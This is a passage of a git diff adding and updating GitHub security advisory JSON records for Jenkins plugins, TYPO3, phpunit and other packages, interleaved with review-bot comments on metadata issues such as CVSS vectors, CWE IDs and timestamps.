"name": "org.jenkins-ci.plugins:proxmox" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.7.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.7.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28144" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-2082" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2022/03/29/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T22:05:12Z", + "nvd_published_at": "2022-03-29T13:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/03/GHSA-75p7-527p-w8wp/GHSA-75p7-527p-w8wp.json b/advisories/github-reviewed/2022/03/GHSA-75p7-527p-w8wp/GHSA-75p7-527p-w8wp.json index 029f51f5df739..8e9711d4e763e 100644 
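Review bot: The `summary` of the new GHSA-2mgj-mwvf-mpg5 record ends with a trailing space (`"Missing permission checks in Jenkins Proxmox Plugin "`), and the new GHSA-m9gv-4523-jffm summary has the same trailing space. These strings are rendered as titles and compared verbatim by consumers, so trim them: `"summary": "Missing permission checks in Jenkins Proxmox Plugin",`. The `details` text also names CVE-2022-28142 as the companion issue for the TLS-validation side effect; OSV has a top-level `related` array for exactly this link, which would let tooling connect the two records instead of leaving it in prose, if the exporter supports it.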
--- a/advisories/github-reviewed/2022/03/GHSA-75p7-527p-w8wp/GHSA-75p7-527p-w8wp.json +++ b/advisories/github-reviewed/2022/03/GHSA-75p7-527p-w8wp/GHSA-75p7-527p-w8wp.json @@ -60,6 +60,10 @@ "type": "WEB", "url": "https://github.com/Rudloff/alltube/commit/bc14b6e45c766c05757fb607ef8d444cbbfba71a" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/rudloff/alltube/CVE-2022-24739.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Rudloff/alltube" diff --git a/advisories/github-reviewed/2022/03/GHSA-7mv4-4xpg-xq44/GHSA-7mv4-4xpg-xq44.json b/advisories/github-reviewed/2022/03/GHSA-7mv4-4xpg-xq44/GHSA-7mv4-4xpg-xq44.json index 1cb7826973192..ae441a687785f 100644 --- a/advisories/github-reviewed/2022/03/GHSA-7mv4-4xpg-xq44/GHSA-7mv4-4xpg-xq44.json +++ b/advisories/github-reviewed/2022/03/GHSA-7mv4-4xpg-xq44/GHSA-7mv4-4xpg-xq44.json @@ -40,6 +40,14 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-26138" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/silverstripe/framework/CVE-2020-26138.yaml" + }, + { + "type": "WEB", + "url": "https://www.silverstripe.org/download/security-releases/cve-2020-26138" + }, { "type": "WEB", "url": "https://www.silverstripe.org/download/security-releases/cve-2020-26138/" diff --git a/advisories/github-reviewed/2022/03/GHSA-crp2-qrr5-8pq7/GHSA-crp2-qrr5-8pq7.json b/advisories/github-reviewed/2022/03/GHSA-crp2-qrr5-8pq7/GHSA-crp2-qrr5-8pq7.json index 80a25eae1d728..ea0a096fa8afd 100644 --- a/advisories/github-reviewed/2022/03/GHSA-crp2-qrr5-8pq7/GHSA-crp2-qrr5-8pq7.json +++ b/advisories/github-reviewed/2022/03/GHSA-crp2-qrr5-8pq7/GHSA-crp2-qrr5-8pq7.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-crp2-qrr5-8pq7", - "modified": "2022-03-29T19:11:08Z", + "modified": "2024-01-31T15:32:06Z", "published": "2022-03-02T21:33:17Z", "aliases": [ "CVE-2022-23648" 
@@ -102,6 +102,18 @@ "type": "WEB", "url": "https://github.com/containerd/containerd/releases/tag/v1.6.1" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/AUDQUQBZJGBWJPMRVB6QCCCRF7O3O4PA/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/HFTS2EF3S7HNYSNZSEJZIJHPRU7OPUV3/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/OCCARJ6FU4MWBTXHZNMS7NELPDBIX2VO/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/AUDQUQBZJGBWJPMRVB6QCCCRF7O3O4PA/" @@ -114,6 +126,10 @@ "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/OCCARJ6FU4MWBTXHZNMS7NELPDBIX2VO/" }, + { + "type": "WEB", + "url": "https://security.gentoo.org/glsa/202401-31" + }, { "type": "WEB", "url": "https://www.debian.org/security/2022/dsa-5091" diff --git a/advisories/github-reviewed/2022/03/GHSA-m9gv-4523-jffm/GHSA-m9gv-4523-jffm.json b/advisories/github-reviewed/2022/03/GHSA-m9gv-4523-jffm/GHSA-m9gv-4523-jffm.json new file mode 100644 index 0000000000000..eff68ac7e4beb --- /dev/null +++ b/advisories/github-reviewed/2022/03/GHSA-m9gv-4523-jffm/GHSA-m9gv-4523-jffm.json 
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-m9gv-4523-jffm", + "modified": "2024-01-30T21:07:16Z", + "published": "2022-03-16T00:00:44Z", + "aliases": [ + "CVE-2022-27199" + ], + "summary": "Missing permission checks in AWS Credentials Plugin ", + "details": "A missing permission check in Jenkins CloudBees AWS Credentials Plugin 189.v3551d5642995 and earlier allows attackers with Overall/Read permission to connect to an AWS service using an attacker-specified token.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:aws-credentials" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "191.vcb_f183ce58b_9" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 189.v3551d5642995" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-27199" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2022-03-15/#SECURITY-2351" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2022/03/15/2" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-276", + "CWE-862" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:07:16Z", + "nvd_published_at": "2022-03-15T17:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/03/GHSA-q7rv-6hp3-vh96/GHSA-q7rv-6hp3-vh96.json b/advisories/github-reviewed/2022/03/GHSA-q7rv-6hp3-vh96/GHSA-q7rv-6hp3-vh96.json index 7d932960f9e66..f496a81980723 100644 --- a/advisories/github-reviewed/2022/03/GHSA-q7rv-6hp3-vh96/GHSA-q7rv-6hp3-vh96.json +++ b/advisories/github-reviewed/2022/03/GHSA-q7rv-6hp3-vh96/GHSA-q7rv-6hp3-vh96.json 
@@ -71,6 +71,10 @@ "type": "WEB", "url": "https://github.com/guzzle/psr7/pull/486/commits/9a96d9db668b485361ed9de7b5bf1e54895df1dc" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/guzzlehttp/psr7/CVE-2022-24775.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/guzzle/psr7" diff --git a/advisories/github-reviewed/2022/03/GHSA-q8hg-pf8v-cxrv/GHSA-q8hg-pf8v-cxrv.json b/advisories/github-reviewed/2022/03/GHSA-q8hg-pf8v-cxrv/GHSA-q8hg-pf8v-cxrv.json index 92b61d94f077f..5c81542b24a84 100644 --- a/advisories/github-reviewed/2022/03/GHSA-q8hg-pf8v-cxrv/GHSA-q8hg-pf8v-cxrv.json +++ b/advisories/github-reviewed/2022/03/GHSA-q8hg-pf8v-cxrv/GHSA-q8hg-pf8v-cxrv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-q8hg-pf8v-cxrv", - "modified": "2023-09-21T20:05:33Z", + "modified": "2024-02-01T15:49:08Z", "published": "2022-03-26T00:22:49Z", "aliases": [ "CVE-2019-18887" @@ -185,6 +185,18 @@ "type": "WEB", "url": "https://github.com/symfony/symfony/releases/tag/v4.3.8" }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/DZNXRVHDQBNZQUCNRVZICPPBFRAUWUJX/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/UED22BOXTL2SSFMGYKA64ZFHGLLJG3EA/" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/VXEAOEANNIVYANTMOJ42NKSU6BGNBULZ/" + }, { "type": "WEB", "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/DZNXRVHDQBNZQUCNRVZICPPBFRAUWUJX/" @@ -217,6 +229,6 @@ "severity": "HIGH", "github_reviewed": true, "github_reviewed_at": "2022-03-26T00:22:49Z", - "nvd_published_at": null + "nvd_published_at": "2019-11-21T23:15:13Z" } } \ No newline at end of file 
diff --git a/advisories/github-reviewed/2022/03/GHSA-r5hc-wm3g-hjw6/GHSA-r5hc-wm3g-hjw6.json b/advisories/github-reviewed/2022/03/GHSA-r5hc-wm3g-hjw6/GHSA-r5hc-wm3g-hjw6.json index 33555293c1321..f32805492acd8 100644 --- a/advisories/github-reviewed/2022/03/GHSA-r5hc-wm3g-hjw6/GHSA-r5hc-wm3g-hjw6.json +++ b/advisories/github-reviewed/2022/03/GHSA-r5hc-wm3g-hjw6/GHSA-r5hc-wm3g-hjw6.json @@ -52,6 +52,10 @@ "type": "WEB", "url": "https://github.com/rudloff/alltube/commit/148a171b240e7ceb076b9e198bef412de14ac55d" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/rudloff/alltube/CVE-2022-0768.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/Rudloff/alltube/" diff --git a/advisories/github-reviewed/2022/03/GHSA-r7c9-c69m-rph8/GHSA-r7c9-c69m-rph8.json b/advisories/github-reviewed/2022/03/GHSA-r7c9-c69m-rph8/GHSA-r7c9-c69m-rph8.json index 07807aee9951e..0dc11ae4bb89f 100644 --- a/advisories/github-reviewed/2022/03/GHSA-r7c9-c69m-rph8/GHSA-r7c9-c69m-rph8.json +++ b/advisories/github-reviewed/2022/03/GHSA-r7c9-c69m-rph8/GHSA-r7c9-c69m-rph8.json @@ -44,7 +44,7 @@ "type": "ECOSYSTEM", "events": [ { - "introduced": "5.0.0" + "introduced": "5.0.10" }, { "fixed": "5.6.3" @@ -75,6 +75,10 @@ "type": "WEB", "url": "https://github.com/sebastianbergmann/phpunit/commit/3aaddb1c5bd9b9b8d070b4cf120e71c36fd08412" }, + { + "type": "WEB", + "url": "https://github.com/FriendsOfPHP/security-advisories/blob/master/phpunit/phpunit/CVE-2017-9841.yaml" + }, { "type": "PACKAGE", "url": "https://github.com/sebastianbergmann/phpunit" diff --git a/advisories/github-reviewed/2022/03/GHSA-wjvr-2hjg-6rhj/GHSA-wjvr-2hjg-6rhj.json b/advisories/github-reviewed/2022/03/GHSA-wjvr-2hjg-6rhj/GHSA-wjvr-2hjg-6rhj.json new file mode 100644 index 0000000000000..dcd52d4642b0f --- /dev/null +++ b/advisories/github-reviewed/2022/03/GHSA-wjvr-2hjg-6rhj/GHSA-wjvr-2hjg-6rhj.json 
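Review bot: Narrowing `introduced` from `"5.0.0"` to `"5.0.10"` in the `@@ -44` hunk silently stops alerting for phpunit 5.0.0–5.0.9, and the only justification visible is the FriendsOfPHP reference added in the next hunk; the source of the 5.0.10 bound should be stated in the commit (presumably the first 5.x release that shipped the vulnerable eval-stdin.php — verify against the referenced upstream commit) so the narrowing can be audited. The diff for this file touches only the `@@ -44` and `@@ -75` hunks, so the top-level `modified` timestamp is left unchanged even though an affected range moved; OSV consumers poll on `modified`, so downstream mirrors may never pick up the narrowed range. Compare the GHSA-q8hg change below, which bumps `modified` alongside its edits.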
@@ -0,0 +1,64 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-wjvr-2hjg-6rhj", + "modified": "2024-01-30T21:07:34Z", + "published": "2022-03-30T00:00:24Z", + "aliases": [ + "CVE-2022-28143" + ], + "summary": "CSRF vulnerability in Proxmox Plugin ", + "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins Proxmox Plugin 0.7.0 and earlier allows attackers to connect to an attacker-specified host using attacker-specified username and password (perform a connection test), disable SSL/TLS validation for the entire Jenkins controller JVM as part of the connection test (see CVE-2022-28142), and test a rollback with attacker-specified parameters.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "org.jenkins-ci.plugins:proxmox" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.7.1" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 0.7.0" + } + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-28143" + }, + { + "type": "WEB", + "url": "https://www.jenkins.io/security/advisory/2022-03-29/#SECURITY-2082" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2022/03/29/1" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-352" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T21:07:34Z", + "nvd_published_at": "2022-03-29T13:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-3276-p9f2-8q89/GHSA-3276-p9f2-8q89.json b/advisories/github-reviewed/2022/04/GHSA-3276-p9f2-8q89/GHSA-3276-p9f2-8q89.json new file mode 100644 index 0000000000000..3a2fc951c01e7 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-3276-p9f2-8q89/GHSA-3276-p9f2-8q89.json 
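Review bot: The vector `CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N` is inconsistent with the CWE-352 classification and the `details` text: a cross-site request forgery only fires when a logged-in victim's browser issues the forged request, which is `UI:R` under CVSS 3.1, and the attacker needs no account on the instance, which is `PR:N`; as written the vector describes a missing-permission-check bug rather than CSRF, so unless the score deliberately follows a different convention it should read `CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N`. `details` also says the connection test disables SSL/TLS validation for the whole controller JVM and points at CVE-2022-28142, but that identifier appears nowhere machine-readable; adding `"related": ["CVE-2022-28142"]` at top level lets tooling link the two advisories. For operators the JVM-wide TLS-validation side effect is the part worth surfacing in `summary`, since it outlives the forged request.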
@@ -0,0 +1,96 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-3276-p9f2-8q89", + "modified": "2024-02-07T21:31:25Z", + "published": "2022-04-21T01:57:47Z", + "aliases": [ + "CVE-2010-3670" + ], + "summary": "TYPO3 is vulnerable to insecure randomness during hash generation in forgot password function", + "details": "TYPO3 before 4.3.4 and 4.4.x before 4.4.1 contains insecure randomness during generation of a hash with the \"forgot password\" function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3670" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/09ab77653161f23e266470a5984d4d5e64588355" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/c03e944d200bf427bb18cad15f2ad36bc83061c9" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/frontend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3670" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Insecure_Randomness" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-326" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-07T21:31:25Z", + "nvd_published_at": "2019-11-05T20:15:00Z" + } +} \ No newline at end of file 
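Review bot: `cwe_ids` is `["CWE-326"]` (Inadequate Encryption Strength), but the issue described is a predictable password-reset hash, which is a randomness weakness (CWE-330/CWE-338), and the sibling GHSA-c7xr-736p-29j3 added in this same commit cites the same `#Insecure_Randomness` section of TYPO3-SA-2010-012 with `CWE-330`; the two should agree, so change this one to `"cwe_ids": ["CWE-330"]`. The affected package is `typo3/cms-frontend`, yet the forgot-password function in TYPO3 4.x lived in the felogin system extension (published separately as `typo3/cms-felogin` on Packagist) — check the two referenced TYPO3 commits and point the `affected` entries at whichever package actually contains the changed file. A predictable reset token typically enables account takeover, so the `C:L/I:L` impact in the vector is also worth re-checking against the referenced advisory.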
diff --git a/advisories/github-reviewed/2022/04/GHSA-48ww-8h7g-4hwq/GHSA-48ww-8h7g-4hwq.json b/advisories/github-reviewed/2022/04/GHSA-48ww-8h7g-4hwq/GHSA-48ww-8h7g-4hwq.json new file mode 100644 index 0000000000000..f490b5e51d650 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-48ww-8h7g-4hwq/GHSA-48ww-8h7g-4hwq.json 
@@ -0,0 +1,142 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-48ww-8h7g-4hwq", + "modified": "2024-02-06T23:33:25Z", + "published": "2022-04-21T01:57:47Z", + "aliases": [ + "CVE-2010-3667" + ], + "summary": "TYPO3 is vulnerable to Spam Abuse in the native form content element", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows Spam Abuse in the native form content element. An attacker could abuse the form to send mails to arbitrary email addresses.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-frontend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3667" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/34da374183dd472fa7987ee25b47544a06bd2173" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/5eb60976cea268b879e02811208e6a1777674cbb" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/78dbe326df7ebc612f40882920a426c82b2ca9d3" + }, + { + "type": "WEB", + "url": 
"https://github.com/TYPO3/typo3/commit/f82696c7d62842edb0bf79ef21a85d56735a1527" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/frontend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3667" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Spam_Abuse" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-20" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-02-06T23:33:25Z", + "nvd_published_at": "2019-11-04T22:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-4rvc-5hrh-qmwf/GHSA-4rvc-5hrh-qmwf.json b/advisories/github-reviewed/2022/04/GHSA-4rvc-5hrh-qmwf/GHSA-4rvc-5hrh-qmwf.json new file mode 100644 index 0000000000000..90a3de786d5f2 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-4rvc-5hrh-qmwf/GHSA-4rvc-5hrh-qmwf.json 
@@ -0,0 +1,126 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-4rvc-5hrh-qmwf", + "modified": "2024-02-07T22:32:53Z", + "published": "2022-04-21T01:57:46Z", + "aliases": [ + "CVE-2010-3662" + ], + "summary": "TYPO3 SQL injection vulnerability on the backend", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows SQL Injection on the backend.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3662" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3662" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#SQL_Injection" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-89" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": 
"2024-02-07T22:32:53Z", + "nvd_published_at": "2019-11-04T22:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-8xp9-99h5-4vcg/GHSA-8xp9-99h5-4vcg.json b/advisories/github-reviewed/2022/04/GHSA-8xp9-99h5-4vcg/GHSA-8xp9-99h5-4vcg.json new file mode 100644 index 0000000000000..64788fb9abbd9 --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-8xp9-99h5-4vcg/GHSA-8xp9-99h5-4vcg.json 
@@ -0,0 +1,126 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8xp9-99h5-4vcg", + "modified": "2024-02-06T23:22:30Z", + "published": "2022-04-21T01:57:47Z", + "aliases": [ + "CVE-2010-3664" + ], + "summary": "TYPO3 is vulnerable to Information Disclosure on the backend", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 allows Information Disclosure on the backend.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-backend" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3664" + }, + { + "type": "WEB", + "url": "https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=590719" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TYPO3-CMS/backend" + }, + { + "type": "WEB", + "url": "https://security-tracker.debian.org/tracker/CVE-2010-3664" + }, + { + "type": "WEB", + "url": "https://typo3.org/security/advisory/typo3-sa-2010-012/#Information_Disclosure" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-200" + ], + "severity": "MODERATE", + "github_reviewed": 
true, + "github_reviewed_at": "2024-02-06T23:22:30Z", + "nvd_published_at": "2019-11-04T22:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2022/04/GHSA-c7xr-736p-29j3/GHSA-c7xr-736p-29j3.json b/advisories/github-reviewed/2022/04/GHSA-c7xr-736p-29j3/GHSA-c7xr-736p-29j3.json new file mode 100644 index 0000000000000..521aa5ef7b72d --- /dev/null +++ b/advisories/github-reviewed/2022/04/GHSA-c7xr-736p-29j3/GHSA-c7xr-736p-29j3.json 
@@ -0,0 +1,142 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-c7xr-736p-29j3", + "modified": "2024-02-06T23:21:45Z", + "published": "2022-04-21T01:57:47Z", + "aliases": [ + "CVE-2010-3666" + ], + "summary": "TYPO3 is vulnerable to Insecure randomness in uniqid function", + "details": "TYPO3 before 4.1.14, 4.2.x before 4.2.13, 4.3.x before 4.3.4 and 4.4.x before 4.4.1 contains insecure randomness in the `uniqid` function.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "4.1.14" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.2.0" + }, + { + "fixed": "4.2.13" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.3.0" + }, + { + "fixed": "4.3.4" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Packagist", + "name": "typo3/cms-install" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "4.4.0" + }, + { + "fixed": "4.4.1" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2010-3666" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/302b35e714ca30ddb71ab36b9cbb2bea760a2f0e" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/352d6066bf09137e86705bc060fd4ab3ba8f9191" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/42324b30546b1e49fb16c916fc71cceb99ad9fd0" + }, + { + "type": "WEB", + "url": "https://github.com/TYPO3/typo3/commit/f6d2e33cfab87c9e44eca275d6755be747e3cd7e" + }, + { + "type": 
